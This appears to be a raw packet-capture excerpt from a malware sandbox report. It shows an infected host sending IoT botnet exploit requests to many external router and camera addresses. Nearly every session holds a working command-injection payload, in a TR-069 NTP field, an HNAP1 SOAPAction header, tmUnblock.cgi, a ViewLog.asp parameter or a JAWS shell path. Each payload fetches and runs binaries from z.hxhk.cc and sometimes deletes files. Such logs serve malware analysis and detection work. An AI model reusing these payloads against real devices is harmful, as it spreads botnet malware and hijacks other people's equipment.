Mar 18, 2024 09:57:00.976589918 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
67	192.168.2.23	55960	107.163.23.60	8081

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:00.979849100 CET	764	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:57:05.001909971 CET	764	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:57:11.159663916 CET	764	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:57:23.190412045 CET	764	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:57:47.251218081 CET	764	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>
Mar 18, 2024 09:58:36.380994081 CET	764	OUT	POST /HNAP1/ HTTP/1.0 Content-Type: text/xml; charset="utf-8" SOAPAction: http://purenetworks.com/HNAP1/`cd /tmp && rm -rf * && wget http://z.hxhk.cc/sys64.mips && chmod +x sys64.mips;./sys64.mips hn.s` Content-Length: 640 Data Raw: 3c 3f 78 6d 6c 20 76 65 72 73 69 6f 6e 3d 22 31 2e 30 22 20 65 6e 63 6f 64 69 6e 67 3d 22 75 74 66 2d 38 22 3f 3e 3c 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 20 78 6d 6c 6e 73 3a 78 73 69 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 2d 69 6e 73 74 61 6e 63 65 22 20 78 6d 6c 6e 73 3a 78 73 64 3d 22 68 74 74 70 3a 2f 2f 77 77 77 2e 77 33 2e 6f 72 67 2f 32 30 30 31 2f 58 4d 4c 53 63 68 65 6d 61 22 20 78 6d 6c 6e 73 3a 73 6f 61 70 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 73 2e 78 6d 6c 73 6f 61 70 2e 6f 72 67 2f 73 6f 61 70 2f 65 6e 76 65 6c 6f 70 65 2f 22 3e 3c 73 6f 61 70 3a 42 6f 64 79 3e 3c 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 20 78 6d 6c 6e 73 3d 22 68 74 74 70 3a 2f 2f 70 75 72 65 6e 65 74 77 6f 72 6b 73 2e 63 6f 6d 2f 48 4e 41 50 31 2f 22 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 66 6f 6f 62 61 72 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 44 65 73 63 72 69 70 74 69 6f 6e 3e 3c 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 31 39 32 2e 31 36 38 2e 30 2e 31 30 30 3c 2f 49 6e 74 65 72 6e 61 6c 43 6c 69 65 6e 74 3e 3c 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 54 43 50 3c 2f 50 6f 72 74 4d 61 70 70 69 6e 67 50 72 6f 74 6f 63 6f 6c 3e 3c 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 45 78 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 31 32 33 34 3c 2f 49 6e 74 65 72 6e 61 6c 50 6f 72 74 3e 3c 2f 41 64 64 50 6f 72 74 4d 61 70 70 69 6e 67 3e 3c 2f 73 6f 61 70 3a 42 6f 64 79 3e 3c 2f 73 6f 61 70 3a 45 6e 76 65 6c 6f 70 65 3e 0d 0a 0d 0a Data Ascii: <?xml version="1.0" encoding="utf-8"?><soap:Envelope xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance" xmlns:xsd="http://www.w3.org/2001/XMLSchema" xmlns:soap="http://schemas.xmlsoap.org/soap/envelope/"><soap:Body><AddPortMapping xmlns="http://purenetworks.com/HNAP1/"><PortMappingDescription>foobar</PortMappingDescription><InternalClient>192.168.0.100</InternalClient><PortMappingProtocol>TCP</PortMappingProtocol><ExternalPort>1234</ExternalPort><InternalPort>1234</InternalPort></AddPortMapping></soap:Body></soap:Envelope>

Session ID	Source IP	Source Port	Destination IP	Destination Port
68	192.168.2.23	41868	14.85.144.61	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.044532061 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
69	192.168.2.23	33510	78.166.28.66	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.072644949 CET	747	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:
Mar 18, 2024 09:57:01.313330889 CET	197	IN	HTTP/1.1 404 Not Found Date: Mon Mar 18 11:57:00 2024 Server: tr069 http server Content-Length: 15 Connection: close Content-Type: text/plain; charset=ISO-8859-1 Data Raw: 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 0a Data Ascii: File not found

Session ID	Source IP	Source Port	Destination IP	Destination Port
70	192.168.2.23	50142	172.67.211.32	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.097054958 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:
Mar 18, 2024 09:57:01.578445911 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:
Mar 18, 2024 09:57:02.186280012 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
71	192.168.2.23	48494	213.243.24.58	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.109793901 CET	442	OUT	POST /cgi-bin/ViewLog.asp HTTP/1.1 Host: 127.0.0.1 Connection: keep-alive Accept-Encoding: gzip, deflate Accept: / User-Agent: r00ts3c-owned-you Content-Length: 176 Content-Type: application/x-www-form-urlencoded Data Raw: 20 72 65 6d 6f 74 65 5f 73 75 62 6d 69 74 5f 46 6c 61 67 3d 31 26 72 65 6d 6f 74 65 5f 73 79 73 6c 6f 67 5f 46 6c 61 67 3d 31 26 52 65 6d 6f 74 65 53 79 73 6c 6f 67 53 75 70 70 6f 72 74 65 64 3d 31 26 4c 6f 67 46 6c 61 67 3d 30 26 72 65 6d 6f 74 65 5f 68 6f 73 74 3d 25 33 62 63 64 2b 2f 74 6d 70 3b 77 67 65 74 2b 68 74 74 70 3a 2f 2f 7a 2e 68 78 68 6b 2e 63 63 2f 73 79 73 36 34 2e 61 72 6d 37 3b 63 68 6d 6f 64 2b 37 37 37 2b 73 79 73 36 34 2e 61 72 6d 37 3b 2e 2f 73 79 73 36 34 2e 61 72 6d 37 2b 7a 79 2e 73 3b 72 6d 2b 2d 72 66 2b 73 79 73 36 34 2e 61 72 6d 37 25 33 62 25 32 33 26 72 65 6d 6f 74 65 53 75 62 6d 69 74 3d 53 61 76 65 0d 0a 0d 0a Data Ascii: remote_submit_Flag=1&remote_syslog_Flag=1&RemoteSyslogSupported=1&LogFlag=0&remote_host=%3bcd+/tmp;wget+http://z.hxhk.cc/sys64.arm7;chmod+777+sys64.arm7;./sys64.arm7+zy.s;rm+-rf+sys64.arm7%3b%23&remoteSubmit=Save

Session ID	Source IP	Source Port	Destination IP	Destination Port
72	192.168.2.23	54920	98.173.248.59	8080

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.132077932 CET	124	OUT	POST /tmUnblock.cgi cd /tmp; rm -rf sys64.mpsl; wget http://z.hxhk.cc/sys64.mpsl;chmod 777 *;./sys64.mpsl asus. Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
73	192.168.2.23	53930	31.52.24.150	7547

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.139381886 CET	735	OUT	POST /UD/act?1 HTTP/1.1 Host: 127.0.0.1:7547 User-Agent: r00ts3c-owned-you SOAPAction: urn:dslforum-org:service:Time:1#SetNTPServers Content-Type: text/xml Content-Length: 526 <?xml version="1.0"?><SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/" SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"> <SOAP-ENV:Body> <u:SetNTPServers xmlns:u="urn:dslforum-org:service:Time:1"> <NewNTPServer1>`cd /tmp;wget http://z.hxhk.cc/sys64.mips; chmod 777 sys64.mips; ./sys64.mips tr.s`</NewNTPServer1> <NewNTPServer2></NewNTPServer2> <NewNTPServer3></NewNTPServer3> <NewNTPServer4></NewNTPServer4> <NewNTPServer5></NewNTPServer5> </u:SetNTPServers> </SOAP-ENV:Body></SOAP-ENV:Envelope Data Raw: Data Ascii:

Session ID	Source IP	Source Port	Destination IP	Destination Port
74	192.168.2.23	52506	2.19.201.24	80

Timestamp	Bytes transferred	Direction	Data
Mar 18, 2024 09:57:01.271172047 CET	243	OUT	GET /shell?cd+/tmp;rm+-rf+;wget+ z.hxhk.cc/jaws;sh+/tmp/jaws+js HTTP/1.1 User-Agent: Hello, world Host: 127.0.0.1:80 Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,/*;q=0.8 Connection: keep-alive
Mar 18, 2024 09:57:01.520692110 CET	134	IN	HTTP/1.0 301 Moved Permanently Location: https://www.oracleindustry.com/unknown Connection: close Content-Length: 0
Mar 18, 2024 09:57:02.137833118 CET	134	IN	HTTP/1.0 301 Moved Permanently Location: https://www.oracleindustry.com/unknown Connection: close Content-Length: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port
75	192.168.2.23	33522	78.166.28.66	7547

Timestamp	Bytes transferred	Direction	Data
